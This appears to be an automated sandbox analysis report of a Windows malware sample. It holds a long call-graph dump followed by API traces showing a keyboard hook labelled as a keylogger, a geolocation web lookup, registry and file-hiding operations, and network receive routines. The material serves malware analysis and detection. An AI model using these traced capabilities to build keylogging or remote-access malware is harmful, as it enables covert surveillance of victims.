97766 469f03e 26 API calls 2 library calls 97722->97766 97724 469d0c5 97725 46a05dd __dosmaperr 20 API calls 97724->97725 97726 469d0ca 97725->97726 97767 469bcec 26 API calls std::_Deallocate 97726->97767 97727 469ce55 97735 469cce0 97727->97735 97729 469d0b0 _swprintf 97729->97724 97729->97727 97768 469d6ba 26 API calls 2 library calls 97729->97768 97769 469e7b5 42 API calls _swprintf 97729->97769 97770 469d882 42 API calls _swprintf 97729->97770 97771 469d8d3 50 API calls 3 library calls 97729->97771 97772 469de9d 50 API calls _swprintf 97729->97772 97736 46a6782 _free 20 API calls 97735->97736 97737 469ccf0 97736->97737 97738 46aabd7 97737->97738 97739 46aabe2 97738->97739 97741 469ce84 97738->97741 97739->97741 97773 469feb9 97739->97773 97742 4694fcb 97741->97742 97743 4694fd4 97742->97743 97744 4694fd6 IsProcessorFeaturePresent 97742->97744 97743->97705 97746 4695018 97744->97746 97779 4694fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97746->97779 97748 46950fb 97748->97705 97750 46aab08 97749->97750 97751 46aaaf3 97749->97751 97750->97709 97752 46a05dd __dosmaperr 20 API calls 97751->97752 97753 46aaaf8 97752->97753 97754 469bcec _strftime 26 API calls 97753->97754 97755 46aab03 97754->97755 97755->97709 97757 46b550f 97756->97757 97758 46b5502 97756->97758 97760 46b551b 97757->97760 97761 46a05dd __dosmaperr 20 API calls 97757->97761 97759 46a05dd __dosmaperr 20 API calls 97758->97759 97762 46b5507 97759->97762 97760->97711 97763 46b553c 97761->97763 97762->97711 97764 469bcec _strftime 26 API calls 97763->97764 97764->97762 97765->97715 97766->97729 97767->97727 97768->97729 97769->97729 97770->97729 97771->97729 97772->97729 97774 469fecd 97773->97774 97775 469fed1 97773->97775 97774->97741 97775->97774 97776 46aaae7 26 API calls 97775->97776 97777 469fef1 97776->97777 97778 46ab94c __wsopen_s 62 API calls 97777->97778 97778->97774 97779->97748 97785 4661fb0 97780->97785 97782 4662f1e 97783 4662055 26 API calls 97782->97783 97784 4662f2d 97783->97784 97784->97228 97786 46625f0 28 API calls 97785->97786 97787 4661fbd 97786->97787 97787->97782 97789 466a127 97788->97789 97790 4673549 3 API calls 97789->97790 97791 466a12e 97790->97791 97792 466a142 97791->97792 97793 466a15c 97791->97793 97795 466a147 97792->97795 97796 4669e9b 97792->97796 97809 466905c 97793->97809 97798 466905c 28 API calls 97795->97798 97796->96969 97800 466a155 97798->97800 97837 466a22d 29 API calls 97800->97837 97802 466a15a 97802->97796 97803->97255 97985 4663222 97804->97985 97806 4663022 97989 4663262 97806->97989 97810 4669072 97809->97810 97811 4662252 26 API calls 97810->97811 97812 466908c 97811->97812 97838 4664267 97812->97838 97814 466909a 97815 466a179 97814->97815 97850 466b8ec 97815->97850 97818 466a1a2 97821 4662093 28 API calls 97818->97821 97819 466a1ca 97820 4662093 28 API calls 97819->97820 97822 466a1d5 97820->97822 97823 466a1ac 97821->97823 97824 4662093 28 API calls 97822->97824 97825 467bc5e 28 API calls 97823->97825 97826 466a1e4 97824->97826 97827 466a1ba 97825->97827 97828 467b4ef 79 API calls 97826->97828 97854 466b164 31 API calls new 97827->97854 97831 466a1e9 CreateThread 97828->97831 97830 466a1c1 97832 4661fd8 26 API calls 97830->97832 97833 466a204 CreateThread 97831->97833 97834 466a210 CreateThread 97831->97834 97862 466a27d 97831->97862 97832->97819 97833->97834 97859 466a267 97833->97859 97835 4661f09 26 API calls 97834->97835 97856 466a289 97834->97856 97836 466a224 97835->97836 97836->97796 97837->97802 97984 466a273 162 API calls 97837->97984 97839 4662888 28 API calls 97838->97839 97840 466427b 97839->97840 97841 46642a5 97840->97841 97842 4664290 97840->97842 97843 46627e6 28 API calls 97841->97843 97848 46642df 28 API calls 97842->97848 97847 46642a3 97843->97847 97845 4664299 97849 4662c48 28 API calls 97845->97849 97847->97814 97848->97845 97849->97847 97851 466b8f5 97850->97851 97852 466a197 97850->97852 97855 466b96c 28 API calls 97851->97855 97852->97818 97852->97819 97854->97830 97855->97852 97865 466acd6 97856->97865 97917 466a2b8 97859->97917 97937 466a726 97862->97937 97867 466ace4 97865->97867 97866 466ad3e Sleep GetForegroundWindow GetWindowTextLengthW 97870 466b904 28 API calls 97866->97870 97867->97866 97868 466a292 97867->97868 97874 467bae6 GetTickCount 97867->97874 97875 466ad84 GetWindowTextW 97867->97875 97877 4661f09 26 API calls 97867->97877 97878 466aedc 97867->97878 97879 466b8ec 28 API calls 97867->97879 97881 466ae49 Sleep 97867->97881 97884 4662093 28 API calls 97867->97884 97885 466add1 97867->97885 97887 46652fd 28 API calls 97867->97887 97889 4663014 28 API calls 97867->97889 97890 4666383 28 API calls 97867->97890 97892 466a636 27 API calls 97867->97892 97893 467bc5e 28 API calls 97867->97893 97894 4661fd8 26 API calls 97867->97894 97895 46943e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 97867->97895 97896 4661f86 97867->97896 97900 4694770 29 API calls __onexit 97867->97900 97901 46943a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 97867->97901 97902 4669044 28 API calls 97867->97902 97904 466b97c 28 API calls 97867->97904 97905 466b748 40 API calls 2 library calls 97867->97905 97906 46a1e81 97867->97906 97870->97867 97874->97867 97875->97867 97877->97867 97880 4661f09 26 API calls 97878->97880 97879->97867 97880->97868 97881->97867 97884->97867 97885->97867 97888 466905c 28 API calls 97885->97888 97903 466b164 31 API calls new 97885->97903 97887->97867 97888->97885 97889->97867 97890->97867 97892->97867 97893->97867 97894->97867 97897 4661f8e 97896->97897 97898 4662252 26 API calls 97897->97898 97899 4661f99 97898->97899 97899->97867 97900->97867 97901->97867 97902->97867 97903->97885 97904->97867 97905->97867 97907 46a1e8d 97906->97907 97910 46a1c7d 97907->97910 97911 46a1c94 97910->97911 97912 46a05dd __dosmaperr 20 API calls 97911->97912 97915 46a1cd5 97911->97915 97913 46a1ccb 97912->97913 97916 469bcec 26 API calls std::_Deallocate 97913->97916 97915->97867 97916->97915 97918 466a333 GetMessageA 97917->97918 97919 466a2d1 GetModuleHandleA SetWindowsHookExA 97917->97919 97921 466a345 TranslateMessage DispatchMessageA 97918->97921 97931 466a270 97918->97931 97919->97918 97920 466a2ed GetLastError 97919->97920 97932 467bb8e 97920->97932 97921->97918 97921->97931 97924 46652fd 28 API calls 97925 466a30e 97924->97925 97926 4662093 28 API calls 97925->97926 97927 466a31d 97926->97927 97928 467b4ef 79 API calls 97927->97928 97929 466a322 97928->97929 97930 4661fd8 26 API calls 97929->97930 97930->97931 97933 46a1e81 26 API calls 97932->97933 97934 467bbb2 97933->97934 97935 4662093 28 API calls 97934->97935 97936 466a2fe 97935->97936 97936->97924 97938 466a73b Sleep 97937->97938 97958 466a675 97938->97958 97940 466a286 97941 466a77b CreateDirectoryW 97943 466a74d 97941->97943 97942 466a78c GetFileAttributesW 97942->97943 97943->97938 97943->97940 97943->97941 97943->97942 97944 466a7a3 SetFileAttributesW 97943->97944 97948 4661e65 28 API calls 97943->97948 97956 466a7ee 97943->97956 97971 467c3f1 97943->97971 97944->97943 97945 46620df 26 API calls 97945->97956 97947 466a81d PathFileExistsW 97947->97956 97948->97943 97950 46620b7 28 API calls 97950->97956 97951 466a926 SetFileAttributesW 97951->97943 97952 4661fd8 26 API calls 97952->97956 97953 4666dd8 28 API calls 97953->97956 97954 4661fe2 28 API calls 97954->97956 97956->97945 97956->97947 97956->97950 97956->97951 97956->97952 97956->97953 97956->97954 97957 4661fd8 26 API calls 97956->97957 97981 467c485 32 API calls 97956->97981 97982 467c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 97956->97982 97957->97943 97959 466a722 97958->97959 97961 466a68b 97958->97961 97959->97943 97960 466a6aa CreateFileW 97960->97961 97962 466a6b8 GetFileSize 97960->97962 97961->97960 97963 466a6ed FindCloseChangeNotification 97961->97963 97964 466a6ff 97961->97964 97965 466a6e2 Sleep 97961->97965 97966 466a6db 97961->97966 97962->97961 97962->97963 97963->97961 97964->97959 97968 466905c 28 API calls 97964->97968 97965->97963 97983 466b0dc 83 API calls 97966->97983 97969 466a71b 97968->97969 97970 466a179 123 API calls 97969->97970 97970->97959 97972 467c404 CreateFileW 97971->97972 97974 467c441 97972->97974 97975 467c43d 97972->97975 97976 467c461 WriteFile 97974->97976 97977 467c448 SetFilePointer 97974->97977 97975->97943 97979 467c476 FindCloseChangeNotification 97976->97979 97980 467c474 97976->97980 97977->97976 97978 467c458 CloseHandle 97977->97978 97978->97975 97979->97975 97980->97979 97981->97956 97982->97956 97983->97965 97986 466322e 97985->97986 97995 4663618 97986->97995 97988 466323b 97988->97806 97990 466326e 97989->97990 97991 4662252 26 API calls 97990->97991 97992 4663288 97991->97992 97993 4662336 26 API calls 97992->97993 97994 4663031 97993->97994 97994->97260 97996 4663626 97995->97996 97997 4663644 97996->97997 97998 466362c 97996->97998 98000 466369e 97997->98000 98001 466365c 97997->98001 98006 46636a6 28 API calls 97998->98006 98007 46628a4 28 API calls 98000->98007 98003 46627e6 28 API calls 98001->98003 98005 4663642 98001->98005 98003->98005 98005->97988 98006->98005 98009 4664186 98008->98009 98010 4662252 26 API calls 98009->98010 98011 4664191 98010->98011 98019 46641bc 98011->98019 98014 46642fc 98030 4664353 98014->98030 98016 466430a 98017 4663262 26 API calls 98016->98017 98018 4664319 98017->98018 98018->97270 98020 46641c8 98019->98020 98023 46641d9 98020->98023 98022 466419c 98022->98014 98024 46641e9 98023->98024 98025 4664206 98024->98025 98026 46641ef 98024->98026 98027 46627e6 28 API calls 98025->98027 98028 4664267 28 API calls 98026->98028 98029 4664204 98027->98029 98028->98029 98029->98022 98031 466435f 98030->98031 98034 4664371 98031->98034 98033 466436d 98033->98016 98035 466437f 98034->98035 98036 4664385 98035->98036 98037 466439e 98035->98037 98098 46634e6 28 API calls 98036->98098 98038 4662888 28 API calls 98037->98038 98039 46643a6 98038->98039 98041 46643bf 98039->98041 98042 4664419 98039->98042 98044 46627e6 28 API calls 98041->98044 98053 466439c 98041->98053 98099 46628a4 28 API calls 98042->98099 98044->98053 98053->98033 98098->98053 98101 466536b 98100->98101 98104 4665382 98101->98104 98103 4665379 98103->97278 98105 4665390 98104->98105 98106 4665396 98105->98106 98107 46653ad 98105->98107 98117 4663850 28 API calls 98106->98117 98108 4662888 28 API calls 98107->98108 98109 46653b5 98108->98109 98111 4665427 98109->98111 98112 46653ce 98109->98112 98118 46628a4 28 API calls 98111->98118 98114 46628e8 28 API calls 98112->98114 98116 46653ab 98112->98116 98114->98116 98116->98103 98117->98116 98125 469aa9a 98119->98125 98123 467388f RegSetValueExA RegCloseKey 98122->98123 98124 46738b9 98122->98124 98123->98124 98124->97291 98128 469aa1b 98125->98128 98127 466170d 98127->97293 98129 469aa2a 98128->98129 98130 469aa3e 98128->98130 98131 46a05dd __dosmaperr 20 API calls 98129->98131 98134 469aa3a __alldvrm 98130->98134 98137 46a8957 11 API calls 2 library calls 98130->98137 98133 469aa2f 98131->98133 98136 469bcec 26 API calls std::_Deallocate 98133->98136 98134->98127 98136->98134 98137->98134 98140 467b8f9 ctype ___scrt_fastfail 98138->98140 98139 4662093 28 API calls 98141 4674f49 98139->98141 98140->98139 98141->97300 98142->97317 98144 4674f02 getaddrinfo WSASetLastError 98143->98144 98145 4674ef8 98143->98145 98144->97338 98282 4674d86 35 API calls ___std_exception_copy 98145->98282 98147 4674efd 98147->98144 98149 4664846 socket 98148->98149 98150 4664839 98148->98150 98152 4664842 98149->98152 98153 4664860 CreateEventW 98149->98153 98283 466489e WSAStartup 98150->98283 98152->97338 98153->97338 98154 466483e 98154->98149 98154->98152 98156 4664f65 98155->98156 98157 4664fea 98155->98157 98158 4664f6e 98156->98158 98159 4664fc0 CreateEventA CreateThread 98156->98159 98160 4664f7d GetLocalTime 98156->98160 98157->97338 98158->98159 98159->98157 98284 4665150 98159->98284 98161 467bb8e 28 API calls 98160->98161 98162 4664f91 98161->98162 98163 46652fd 28 API calls 98162->98163 98164 4664fa1 98163->98164 98165 4662093 28 API calls 98164->98165 98166 4664fb0 98165->98166 98167 467b4ef 79 API calls 98166->98167 98168 4664fb5 98167->98168 98169 4661fd8 26 API calls 98168->98169 98169->98159 98171 46648ee 98170->98171 98172 4664a1b 98170->98172 98173 466497e 98171->98173 98176 466531e 28 API calls 98171->98176 98196 4664923 98171->98196 98172->98173 98174 4664a21 WSAGetLastError 98172->98174 98173->97338 98174->98173 98175 4664a31 98174->98175 98177 4664a36 98175->98177 98178 4664932 98175->98178 98180 466490f 98176->98180 98293 467cae1 30 API calls 98177->98293 98183 4662093 28 API calls 98178->98183 98184 4662093 28 API calls 98180->98184 98182 466492b 98182->98178 98186 4664941 98182->98186 98187 4664a80 98183->98187 98188 466491e 98184->98188 98185 4664a40 98189 46652fd 28 API calls 98185->98189 98193 4664987 98186->98193 98194 4664950 98186->98194 98190 4662093 28 API calls 98187->98190 98191 467b4ef 79 API calls 98188->98191 98192 4664a50 98189->98192 98195 4664a8f 98190->98195 98191->98196 98197 4662093 28 API calls 98192->98197 98290 4681a40 56 API calls 98193->98290 98198 4662093 28 API calls 98194->98198 98199 467b4ef 79 API calls 98195->98199 98288 4680c60 27 API calls 98196->98288 98201 4664a5f 98197->98201 98202 466495f 98198->98202 98199->98173 98204 467b4ef 79 API calls 98201->98204 98205 4662093 28 API calls 98202->98205 98203 466498f 98206 46649c4 98203->98206 98207 4664994 98203->98207 98208 4664a64 98204->98208 98211 466496e 98205->98211 98292 4680e06 28 API calls 98206->98292 98209 4662093 28 API calls 98207->98209 98210 4661fd8 26 API calls 98208->98210 98213 46649a3 98209->98213 98210->98173 98214 467b4ef 79 API calls 98211->98214 98216 4662093 28 API calls 98213->98216 98217 4664973 98214->98217 98215 46649cc 98218 46649f9 CreateEventW CreateEventW 98215->98218 98220 4662093 28 API calls 98215->98220 98219 46649b2 98216->98219 98289 467e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 98217->98289 98218->98173 98221 467b4ef 79 API calls 98219->98221 98223 46649e2 98220->98223 98224 46649b7 98221->98224 98225 4662093 28 API calls 98223->98225 98291 46810b2 54 API calls 98224->98291 98227 46649f1 98225->98227 98228 467b4ef 79 API calls 98227->98228 98229 46649f6 98228->98229 98229->98218 98294 467b7b6 GlobalMemoryStatusEx 98230->98294 98232 467b7f5 98232->97338 98295 4674580 98233->98295 98237 466dda5 98236->98237 98238 46734ff 3 API calls 98237->98238 98239 466ddac 98238->98239 98240 4673549 3 API calls 98239->98240 98241 466ddc4 98239->98241 98240->98241 98241->97338 98243 46620b7 28 API calls 98242->98243 98244 467bc57 98243->98244 98244->97338 98246 467bafc GetTickCount 98245->98246 98246->97338 98248 4696e90 ___scrt_fastfail 98247->98248 98249 467bab5 GetForegroundWindow GetWindowTextW 98248->98249 98250 466417e 28 API calls 98249->98250 98251 467badf 98250->98251 98251->97338 98253 4662093 28 API calls 98252->98253 98254 466f8f6 98253->98254 98254->97338 98256 46620df 26 API calls 98255->98256 98257 4662f3d 98256->98257 98258 46632a0 28 API calls 98257->98258 98259 4662f59 98258->98259 98259->97338 98261 46620df 26 API calls 98260->98261 98262 4664c27 98261->98262 98263 46620df 26 API calls 98262->98263 98266 4664c30 98263->98266 98264 469bd51 new 21 API calls 98264->98266 98266->98264 98267 46620b7 28 API calls 98266->98267 98268 4664ca1 98266->98268 98269 4661fe2 28 API calls 98266->98269 98272 4661fd8 26 API calls 98266->98272 98324 4664b96 98266->98324 98330 4664cc3 98266->98330 98267->98266 98342 4664e26 98 API calls 98268->98342 98269->98266 98271 4664ca8 98273 4661fd8 26 API calls 98271->98273 98272->98266 98274 4664cb1 98273->98274 98275 4661fd8 26 API calls 98274->98275 98276 4664cba 98275->98276 98276->97338 98278->97338 98279->97345 98280->97345 98281->97345 98282->98147 98283->98154 98287 466515c 101 API calls 98284->98287 98286 4665159 98287->98286 98288->98182 98289->98173 98290->98203 98291->98217 98292->98215 98293->98185 98294->98232 98298 4674553 98295->98298 98299 4674568 ___scrt_initialize_default_local_stdio_options 98298->98299 98302 469f79d 98299->98302 98305 469c4f0 98302->98305 98306 469c518 98305->98306 98307 469c530 98305->98307 98309 46a05dd __dosmaperr 20 API calls 98306->98309 98307->98306 98308 469c538 98307->98308 98311 469a7b7 _strftime 38 API calls 98308->98311 98310 469c51d 98309->98310 98322 469bcec 26 API calls std::_Deallocate 98310->98322 98313 469c548 98311->98313 98315 469cc76 _swprintf 20 API calls 98313->98315 98314 4694fcb TranslatorGuardHandler 5 API calls 98316 4674576 98314->98316 98317 469c5c0 98315->98317 98316->97338 98323 469d2e4 50 API calls 3 library calls 98317->98323 98319 469cce0 _swprintf 20 API calls 98321 469c528 98319->98321 98320 469c5cb 98320->98319 98321->98314 98322->98321 98323->98320 98325 4664ba0 WaitForSingleObject 98324->98325 98326 4664bcd recv 98324->98326 98343 4681076 56 API calls 98325->98343 98328 4664be0 98326->98328 98328->98266 98329 4664bbc SetEvent 98329->98328 98331 46620df 26 API calls 98330->98331 98340 4664cde 98331->98340 98332 4664e13 98333 4661fd8 26 API calls 98332->98333 98334 4664e1c 98333->98334 98334->98266 98335 4661fd8 26 API calls 98335->98340 98336 4661fc0 28 API calls 98338 4664dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 98336->98338 98337 46620f6 28 API calls 98337->98340 98338->98340 98344 4675aea 98338->98344 98339 46641a2 28 API calls 98339->98340 98340->98332 98340->98335 98340->98336 98340->98337 98340->98339 98341 4661fe2 28 API calls 98340->98341 98341->98340 98342->98271 98343->98329 98345 46620f6 28 API calls 98344->98345 98346 4675b0c SetEvent 98345->98346 98347 4675b21 98346->98347 98348 46641a2 28 API calls 98347->98348 98349 4675b3b 98348->98349 98350 46620f6 28 API calls 98349->98350 98351 4675b4b 98350->98351 98352 46620f6 28 API calls 98351->98352 98353 4675b5d 98352->98353 98354 467be1b 28 API calls 98353->98354 98355 4675b66 98354->98355 98357 4675b86 GetTickCount 98355->98357 98358 4675ce5 98355->98358 98421 4675cc9 98355->98421 98356 4661e8d 26 API calls 98359 4677092 98356->98359 98360 467bb8e 28 API calls 98357->98360 98358->98421 98422 4675cf9 98358->98422 98361 4661fd8 26 API calls 98359->98361 98363 4675b97 98360->98363 98365 467709e 98361->98365 98366 467bae6 GetTickCount 98363->98366 98364 4675d01 98364->98421 98368 4661fd8 26 API calls 98365->98368 98367 4675ba3 98366->98367 98369 467bb8e 28 API calls 98367->98369 98370 46770aa 98368->98370 98371 4675bae 98369->98371 98372 467ba96 30 API calls 98371->98372 98373 4675bbc 98372->98373 98423 467bd1e 98373->98423 98376 4661e65 28 API calls 98377 4675bd8 98376->98377 98378 4662f31 28 API calls 98377->98378 98379 4675be6 98378->98379 98427 4662ea1 98379->98427 98382 4662f10 28 API calls 98383 4675c04 98382->98383 98384 4662ea1 28 API calls 98383->98384 98385 4675c13 98384->98385 98386 4662f10 28 API calls 98385->98386 98387 4675c1f 98386->98387 98388 4662ea1 28 API calls 98387->98388 98389 4675c29 98388->98389 98390 4664aa1 60 API calls 98389->98390 98391 4675c38 98390->98391 98392 4661fd8 26 API calls 98391->98392 98393 4675c41 98392->98393 98394 4661fd8 26 API calls 98393->98394 98395 4675c4d 98394->98395 98396 4661fd8 26 API calls 98395->98396 98397 4675c59 98396->98397 98398 4661fd8 26 API calls 98397->98398 98399 4675c65 98398->98399 98400 4661fd8 26 API calls 98399->98400 98401 4675c71 98400->98401 98402 4661fd8 26 API calls 98401->98402 98403 4675c7d 98402->98403 98404 4661f09 26 API calls 98403->98404 98405 4675c86 98404->98405 98406 4661fd8 26 API calls 98405->98406 98407 4675c8f 98406->98407 98408 4661fd8 26 API calls 98407->98408 98409 4675c98 98408->98409 98410 4661e65 28 API calls 98409->98410 98411 4675ca3 98410->98411 98412 469baac _strftime 42 API calls 98411->98412 98413 4675cb0 98412->98413 98414 4675cb5 98413->98414 98415 4675cdb 98413->98415 98417 4675cc3 98414->98417 98418 4675cce 98414->98418 98416 4661e65 28 API calls 98415->98416 98416->98358 98436 4664ff4 98417->98436 98420 4664f51 104 API calls 98418->98420 98420->98421 98421->98356 98460 46650e4 83 API calls 98422->98460 98424 467bd2b 98423->98424 98425 46620b7 28 API calls 98424->98425 98426 4675bca 98425->98426 98426->98376 98433 4662eb0 98427->98433 98428 4662ef2 98429 4661fb0 28 API calls 98428->98429 98430 4662ef0 98429->98430 98431 4662055 26 API calls 98430->98431 98432 4662f09 98431->98432 98432->98382 98433->98428 98434 4662ee7 98433->98434 98461 4663365 28 API calls 98434->98461 98437 4665007 98436->98437 98438 46650c1 98436->98438 98437->98438 98439 466502b GetLocalTime 98437->98439 98440 466506a 98437->98440 98438->98421 98441 467bb8e 28 API calls 98439->98441 98440->98438 98442 4665082 GetLocalTime 98440->98442 98443 4665041 98441->98443 98444 467bb8e 28 API calls 98442->98444 98445 46652fd 28 API calls 98443->98445 98446 4665098 98444->98446 98447 466504e 98445->98447 98448 46652fd 28 API calls 98446->98448 98449 4662093 28 API calls 98447->98449 98450 46650a5 98448->98450 98451 4665059 98449->98451 98452 4662093 28 API calls 98450->98452 98453 467b4ef 79 API calls 98451->98453 98454 46650b0 98452->98454 98455 466505e 98453->98455 98456 467b4ef 79 API calls 98454->98456 98457 4661fd8 26 API calls 98455->98457 98458 46650b5 98456->98458 98457->98440 98459 4661fd8 26 API calls 98458->98459 98459->98438 98460->98364 98461->98430 98463->97413 98464->97439 98465->97440 98466->97428 98467->97432 98468->97438 98507 467d50f 98469->98507 98472 467d4f9 GetMessageA 98473 467d4e5 TranslateMessage DispatchMessageA 98472->98473 98474 467d50a 98472->98474 98473->98472 98477 466f7c2 98475->98477 98476 4673549 3 API calls 98476->98477 98477->98476 98479 466f866 98477->98479 98481 466f856 Sleep 98477->98481 98497 466f7f4 98477->98497 98478 466905c 28 API calls 98478->98497 98480 466905c 28 API calls 98479->98480 98484 466f871 98480->98484 98481->98477 98483 467bc5e 28 API calls 98483->98497 98485 467bc5e 28 API calls 98484->98485 98486 466f87d 98485->98486 98515 4673814 29 API calls 98486->98515 98489 4661f09 26 API calls 98489->98497 98490 466f890 98491 4661f09 26 API calls 98490->98491 98493 466f89c 98491->98493 98492 4662093 28 API calls 98492->98497 98494 4662093 28 API calls 98493->98494 98495 466f8ad 98494->98495 98498 467376f 29 API calls 98495->98498 98496 467376f 29 API calls 98496->98497 98497->98478 98497->98481 98497->98483 98497->98489 98497->98492 98497->98496 98513 466d096 111 API calls ___scrt_fastfail 98497->98513 98514 4673814 29 API calls 98497->98514 98499 466f8c0 98498->98499 98516 4672850 TerminateProcess WaitForSingleObject 98499->98516 98501 466f8c8 ExitProcess 98517 46727ee 61 API calls 98503->98517 98508 4696e90 ___scrt_fastfail 98507->98508 98509 467d526 RegisterClassExA 98508->98509 98510 467d481 ExtractIconA lstrcpynA Shell_NotifyIconA 98509->98510 98511 467d566 CreateWindowExA 98509->98511 98510->98472 98511->98510 98512 467d580 GetLastError 98511->98512 98512->98510 98514->98497 98515->98490 98516->98501

                                                                                                                              Executed Functions

                                                                                                                              Function 0466A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1253 466a2b8-466a2cf 1254 466a333-466a343 GetMessageA 1253->1254 1255 466a2d1-466a2eb GetModuleHandleA SetWindowsHookExA 1253->1255 1257 466a345-466a35d TranslateMessage DispatchMessageA 1254->1257 1258 466a35f 1254->1258 1255->1254 1256 466a2ed-466a31d GetLastError call 467bb8e call 46652fd call 4662093 call 467b4ef 1255->1256 1267 466a322-466a331 call 4661fd8 1256->1267 1257->1254 1257->1258 1260 466a361-466a366 1258->1260 1267->1260
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0466A2D3
                                                                                                                              • SetWindowsHookExA.USER32(0000000D,0466A2A4,00000000), ref: 0466A2E1
                                                                                                                              • GetLastError.KERNEL32 ref: 0466A2ED
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0466A33B
                                                                                                                              • TranslateMessage.USER32(?), ref: 0466A34A
                                                                                                                              • DispatchMessageA.USER32(?), ref: 0466A355
                                                                                                                              Strings
                                                                                                                              • Keylogger initialization failure: error , xrefs: 0466A301
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                              • String ID: Keylogger initialization failure: error
                                                                                                                              • API String ID: 3219506041-952744263
                                                                                                                              • Opcode ID: 8cdc229b0267263d36e7e2dccb69e6bc6994d925b5f0afd34100932e34330125
                                                                                                                              • Instruction ID: 5cb951111b5fe0183d3db6244068e436ff98ec2f5dea13fac86ff1c443fe81ac
                                                                                                                              • Opcode Fuzzy Hash: 8cdc229b0267263d36e7e2dccb69e6bc6994d925b5f0afd34100932e34330125
                                                                                                                              • Instruction Fuzzy Hash: 8911A371A54341ABDB107FB9DC0986B77ECEBD6619B00052DF987E2140FA34E945CBA2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0467B3A7
                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0467B3BD
                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0467B3D6
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0467B41C
                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0467B41F
                                                                                                                              Strings
                                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0467B3B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                                                              • API String ID: 3121278467-91888290
                                                                                                                              • Opcode ID: 8a0ac5089841c8aaac5bb9e99203f2f65f6a620c03732c8c728700c0b83c23ea
                                                                                                                              • Instruction ID: 4999e6f3c14bda73637559968a706709d589e60438a2a42f0e708a68708e0447
                                                                                                                              • Opcode Fuzzy Hash: 8a0ac5089841c8aaac5bb9e99203f2f65f6a620c03732c8c728700c0b83c23ea
                                                                                                                              • Instruction Fuzzy Hash: 8211947150A3216BD724AA259C48DBB7FECEF86665F00053DF90592280EB64BC48C6F6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0466F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04673549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04673569
                                                                                                                                • Part of subcall function 04673549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 04673587
                                                                                                                                • Part of subcall function 04673549: RegCloseKey.KERNEL32(?), ref: 04673592
                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0466F85B
                                                                                                                              • ExitProcess.KERNEL32 ref: 0466F8CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                              • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                              • API String ID: 2281282204-930821335
                                                                                                                              • Opcode ID: 9b93f2b68acc380ddbee1fe085ae528d59520cfc5add901d7a72a5ad32b1a307
                                                                                                                              • Instruction ID: b0610e99f90d1a5f4c75e2f6ed94cc0c23cd298db8ff3f15ac55c55370843b2f
                                                                                                                              • Opcode Fuzzy Hash: 9b93f2b68acc380ddbee1fe085ae528d59520cfc5add901d7a72a5ad32b1a307
                                                                                                                              • Instruction Fuzzy Hash: 2C210871F1030197F6087779886A6BE39A99B91619F50401CF41B473C4FE35BD4587EE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 066E1179 Relevance: 4.9, APIs: 3, Instructions: 354memorylibraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
